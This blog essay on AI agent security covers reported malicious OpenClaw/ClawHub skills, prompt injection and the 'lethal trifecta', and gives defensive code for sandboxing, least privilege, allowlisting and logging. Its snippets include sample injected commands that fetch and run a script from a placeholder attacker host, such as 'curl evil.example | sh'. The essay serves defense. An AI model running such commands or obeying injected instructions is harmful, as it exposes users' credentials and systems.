the problem isn’t OpenClaw. it’s the architecture.
If you’ve been playing with agent frameworks lately, you’ve probably felt this shift in your gut:
A chatbot answers questions.
An agent does things.
It runs commands. It edits files. It clicks around your browser. It glues tools together and keeps going until it hits the goal you gave it.
That’s not “prompting in a tab.” That’s closer to onboarding a junior engineer… and then handing them your laptop password.
And yeah, I know that sounds dramatic. But the last couple weeks around OpenClaw made the risk impossible to ignore.
OpenClaw is the canary, not the problem
In late January / early February 2026, security folks started flagging a wave of malicious "skills" landing in ClawHub (OpenClaw's skill marketplace). The reports weren't subtle: large numbers of malicious skills, supply-chain-style distribution, and "setup steps" that essentially boil down to "please copy/paste this suspicious command into your terminal."
See: The Hacker News coverage of the malicious ClawHub skills and Tom’s Hardware’s writeup.
Then OpenClaw responded by partnering with VirusTotal to scan third-party skills (helpful, but not a cure-all).
See: The Verge on OpenClaw integrating scanning after the malicious skills flood and The Hacker News on the VirusTotal integration.
If your takeaway from this is “wow, OpenClaw is messy,” you’re not wrong.
But you’re also missing the bigger point.
OpenClaw is just the first agent ecosystem to get punched in the mouth at scale. This same story is going to replay anywhere we have:
autonomous tool use
easy plugin installs
users who want things to “just work”
attackers who love free distribution
So no, the lesson isn’t “OpenClaw bad.”
The lesson is: agent + tools + marketplace is a new attack surface.
prompts are not policies
Here’s the trap: people write a strong system prompt and call it “guardrails.”
“Never exfiltrate secrets.”
“Only store credentials in Vault.”
“Ask me before running risky commands.”
Nice intentions. Not enforcement.
The moment your agent reads untrusted content (web pages, emails, tickets, docs pasted from who-knows-where), prompt injection becomes a real operational risk. Anthropic has been blunt about this in the context of browser agents: the web is adversarial, and prompt injection defenses are still an active area of work.
Read: Anthropic’s “Mitigating the risk of prompt injections in browser use”.
Simon Willison has a super practical framing for when this gets dangerous. He calls it the “lethal trifecta”:
the agent can access private data
it can ingest untrusted content
it can communicate externally
Put those three together and it’s shockingly easy to build a data-exfil machine without meaning to.
Read: Simon Willison’s “The lethal trifecta for AI agents”.
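The trifecta is easy to sketch as a check. This is a toy illustration (the names are mine, not from any real framework): an agent setup only becomes a data-exfil machine when all three legs are present at once, which is also why removing any single leg is a meaningful mitigation.

```python
# Toy model of Willison's "lethal trifecta" (all names illustrative):
# the danger appears only when all three capabilities combine.
from dataclasses import dataclass

@dataclass
class AgentCapabilities:
    reads_private_data: bool       # e.g. local files, email, secrets
    ingests_untrusted: bool        # e.g. web pages, inbound tickets
    communicates_externally: bool  # e.g. HTTP egress, sending messages

def lethal_trifecta(caps: AgentCapabilities) -> bool:
    """True only when every leg of the trifecta is present."""
    return (caps.reads_private_data
            and caps.ingests_untrusted
            and caps.communicates_externally)

browser_agent = AgentCapabilities(True, True, True)
offline_summarizer = AgentCapabilities(True, True, False)  # no egress

print(lethal_trifecta(browser_agent))       # True
print(lethal_trifecta(offline_summarizer))  # False
```

Cutting any one capability (most often external comms) drops you out of the worst-case scenario, which is a far stronger move than asking the model nicely.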
This is why I keep saying: a prompt is not a security boundary. It’s a suggestion. Sometimes a good one! Still a suggestion.
why tool access explodes the blast radius
A normal chatbot hallucinating is annoying.
An agent hallucinating can wreck your day.
Tool use changes the failure mode from “wrong answer” to “wrong action.”
OWASP basically codified this in the 2025 LLM Top 10. A few entries map directly to agent-style problems:
prompt injection
supply chain risk
improper output handling (piping model output directly into downstream systems)
excessive agency (letting the model take too many actions with too much access)
If you haven’t skimmed that list yet, it’s worth it.
See: OWASP Top 10 for LLM Applications v2025 (PDF).
The “improper output handling” one is especially spicy for agents. If the model can output something that later becomes:
a shell command
a Terraform change
a SQL query
a CI step
a “helpful” one-liner you copy/paste
…you’ve basically created an injection surface with extra steps.
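Here's the classic shape of that injection surface, sketched in Python. The "model output" string is a stand-in for whatever the LLM produced; an attacker controls it via prompt injection.

```python
# Why "model output -> shell" is injection with extra steps.
# model_filename stands in for untrusted LLM output.
import shlex

model_filename = "notes.txt; curl evil.example | sh"  # injected payload

# BAD: interpolating model output into a shell string would execute
# the payload if this string were ever passed to a shell.
unsafe = f"cat {model_filename}"

# BETTER: pass it as a single argv element, so nothing parses the ';'.
safe_argv = ["cat", model_filename]

# If a shell string is truly unavoidable, quote it first.
quoted = f"cat {shlex.quote(model_filename)}"

print(unsafe)      # cat notes.txt; curl evil.example | sh
print(safe_argv)
print(quoted)
```

The same rule applies to SQL (parameterized queries, never string-built), Terraform, and CI steps: model output is data, and it should never be concatenated into something that gets parsed as code.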
And the plugin/skill ecosystem makes it worse, because now we’re not just trusting the model. We’re trusting third-party code and instructions that the user installs because the marketplace UI made it look legit.
That’s exactly what the OpenClaw/ClawHub incidents showed: malicious skills dressed up as useful automation, nudging people into risky execution paths, then grabbing credentials and data.
we don’t have adult operational norms yet
You can tell we’re early because everyone’s behavior is all over the place:
Some folks are buying a dedicated machine just to run agents.
Other folks are running them on their main laptop - the same one with saved browser sessions, SSH keys, tax docs, password manager unlocked half the day, you name it.
That divergence alone is a tell: we don’t have mature defaults.
When something is mature, you don’t need a debate thread to learn the safe baseline. The baseline is obvious, boring, and widely shared.
Right now, with agents, the baseline is vibes. It also feels like most people are installing and running skills without fully reading them or understanding what they do.
what “grown-up agent security” looks like
If you want a mental model that actually helps, treat your agent like production infrastructure.
Not a cute productivity app. Infrastructure.
Here’s the checklist I’d want in place before I let an agent anywhere near real credentials.
1) sandbox the runtime (for real)
If the agent gets tricked, you want it trapped in a box you can delete without feeling pain:
a VM
a container with actual restrictions
a separate OS user
a separate machine
The goal is simple: compromise happens, damage stays contained.
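As a minimal sketch of that shape (not a substitute for a real VM or container, just an illustration): run the agent's commands in a throwaway working directory, with a stripped environment and a hard timeout, then delete the whole box afterwards.

```python
# Sketch: "trap it in a box you can delete without pain."
# NOT a real sandbox on its own -- pair with a VM/container in practice.
import shutil
import subprocess
import sys
import tempfile

def run_in_scratch(argv: list[str], timeout: int = 30) -> str:
    scratch = tempfile.mkdtemp(prefix="agent-box-")  # disposable workdir
    try:
        result = subprocess.run(
            argv,
            cwd=scratch,                    # agent writes only inside the box
            env={"PATH": "/usr/bin:/bin"},  # no inherited secrets in env vars
            capture_output=True,
            text=True,
            timeout=timeout,                # runaway loops get killed
        )
        return result.stdout
    finally:
        shutil.rmtree(scratch)              # delete the box, feel nothing

print(run_in_scratch([sys.executable, "-c", "print('hello from the box')"]))
```

The real versions of this are a VM snapshot you can revert, or a container with seccomp/network restrictions; the sketch just shows the property you're after: compromise stays inside something disposable.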
2) scope credentials like you actually mean it
Stop handing agents “god tokens.”
Give each agent the smallest possible permissions for the shortest possible time.
If the agent only needs to read one repo, don’t give it write access to all repos. If it only needs access to a single service account, don’t hand it your personal credentials.
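A sketch of what "smallest permissions, shortest time" looks like in code (every name here is hypothetical, not a real token API): mint a credential scoped to one resource, one permission set, and a short expiry, and check all three on every use.

```python
# Hypothetical least-privilege token issuance: one resource, explicit
# permissions, short TTL. Not a real API -- just the shape of the control.
import time
from dataclasses import dataclass

@dataclass(frozen=True)
class ScopedToken:
    resource: str                 # exactly one repo/service, never "*"
    permissions: frozenset        # e.g. {"read"}, not "admin"
    expires_at: float             # unix timestamp

def mint_token(resource: str, permissions: set, ttl_seconds: int = 900) -> ScopedToken:
    """Default TTL of 15 minutes, not 'forever'."""
    return ScopedToken(resource, frozenset(permissions), time.time() + ttl_seconds)

def allows(token: ScopedToken, resource: str, permission: str) -> bool:
    return (time.time() < token.expires_at
            and token.resource == resource
            and permission in token.permissions)

tok = mint_token("org/agent-playground", {"read"})
print(allows(tok, "org/agent-playground", "read"))   # True
print(allows(tok, "org/agent-playground", "write"))  # False
print(allows(tok, "org/prod-infra", "read"))         # False
```

If the agent gets popped, the attacker gets fifteen minutes of read access to one sandbox repo, not your personal GitHub account.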
3) restrict tools, don’t “ask nicely”
“Ask before doing risky things” is not a control. It’s a UX preference.
Hard controls beat polite instructions:
allowlist commands (or tool actions)
deny outbound network by default
require approval for high-risk actions (payments, sending messages, deleting files, pushing to prod)
Yes, that introduces friction. That friction is the point.
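The difference between a hard control and a polite instruction is that the hard control sits outside the model. A minimal sketch (names are illustrative): a tool gateway that allowlists commands, denies everything else, and routes high-risk actions through an explicit approval hook.

```python
# Sketch of a hard control: the gate runs outside the model, so no prompt
# can talk its way past it. Command names and risk sets are illustrative.
ALLOWED_COMMANDS = {"git", "ls", "cat", "grep"}
HIGH_RISK_SUBCOMMANDS = {"git": {"push"}}  # e.g. pushing needs approval

def gate(argv: list, approve=lambda argv: False) -> str:
    """Return 'allowed' or a denial reason; approve() is a human-in-the-loop hook."""
    cmd = argv[0]
    if cmd not in ALLOWED_COMMANDS:
        return "denied: not on allowlist"
    if len(argv) > 1 and argv[1] in HIGH_RISK_SUBCOMMANDS.get(cmd, set()):
        if not approve(argv):
            return "denied: approval required"
    return "allowed"

print(gate(["ls", "-la"]))                            # allowed
print(gate(["curl", "evil.example"]))                 # denied: not on allowlist
print(gate(["git", "push"]))                          # denied: approval required
print(gate(["git", "push"], approve=lambda a: True))  # allowed
```

Note that the default answer for anything off-list is no; the model never gets a vote.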
4) log actions, not just the chat
If your agent can run commands and change files, you need visibility into:
commands executed
files written/modified
network egress (where it connected, what it sent)
tool invocation history
A conversation transcript is not an audit trail.
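The cheapest version of this is structured logging at the tool boundary. A sketch (the tool and field names are mine): wrap every tool so each invocation lands in an append-only record with a timestamp, the tool name, and its arguments.

```python
# Sketch: audit tool invocations, not just chat. Field names illustrative.
import time

AUDIT_LOG = []  # in practice: append-only, shipped off-host

def audited(tool_name: str):
    """Decorator that records every invocation of a tool."""
    def wrap(fn):
        def inner(*args, **kwargs):
            AUDIT_LOG.append({
                "ts": time.time(),
                "tool": tool_name,
                "args": [repr(a) for a in args],  # real version: redact secrets
            })
            return fn(*args, **kwargs)
        return inner
    return wrap

@audited("write_file")
def write_file(path: str, content: str) -> int:
    # stand-in tool; a real one would also log bytes written
    return len(content)

write_file("/tmp/notes.txt", "hello")
print(AUDIT_LOG[-1]["tool"])  # write_file
```

When something goes sideways, "which commands ran, touching which files, talking to which hosts" is the question you'll be asked. The transcript can't answer it; this can.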
5) treat skills/plugins like dependencies
Skill marketplaces are package registries wearing a nicer outfit.
And we already know how this goes.
This is why curated marketplaces exist at all. Trail of Bits’ curated skills repo is explicitly positioned as a community-reviewed gate because untrusted skills have shown up with “backdoors or malicious hooks.”
See: trailofbits/skills-curated.
If you’re installing a skill that can execute code locally, you should treat it like running a random binary from the internet. Because that’s basically what it is.
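Dependency hygiene translates directly: pin the exact content you reviewed and refuse anything that drifts. A sketch (skill names and contents here are made up): record a SHA-256 of the skill file at review time, and verify it before every run.

```python
# Sketch: treat skills like dependencies -- pin by hash, verify before use.
# Skill names and contents are illustrative.
import hashlib

PINNED = {}  # skill name -> sha256 hex digest recorded at review time

def pin(name: str, content: bytes) -> None:
    """Record the hash of the skill version you actually read."""
    PINNED[name] = hashlib.sha256(content).hexdigest()

def verify(name: str, content: bytes) -> bool:
    """True only if the content matches what was reviewed."""
    return PINNED.get(name) == hashlib.sha256(content).hexdigest()

reviewed = b"echo 'harmless automation'"
pin("tidy-downloads", reviewed)

print(verify("tidy-downloads", reviewed))                        # True
print(verify("tidy-downloads", reviewed + b"\ncurl evil | sh"))  # False
```

A marketplace update that silently swaps in a payload fails the check, exactly the way a lockfile catches a tampered package.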
OpenClaw is going to improve. They'll scan more. They'll add guardrails. They'll get yelled at until they build better controls. That's fine.
But the bigger issue isn’t one agent framework’s bug count.
It’s the mismatch between capability and boundaries.
We’re deploying autonomous execution engines faster than we’re defining the security model around them.
And if you’re thinking, “that sounds like every other tech wave,” yeah. Exactly. The only difference is the failure mode is closer to “oops, it executed” than “oops, it rendered wrong.”
Agents aren’t inherently malicious. Most of the time they’re trying to help.
But they’re powerful systems operating in messy environments, eating untrusted inputs, and acting with permissions we often haven’t properly scoped.
Treating that as a harmless productivity tool is a category error.
So if you want to run agents today, I’m not saying don’t do it. I’m saying do it like an adult:
sandbox, least privilege, segmentation, observability.
Because the agent wave is happening either way.
The only question is whether it happens on your terms, or on an attacker’s.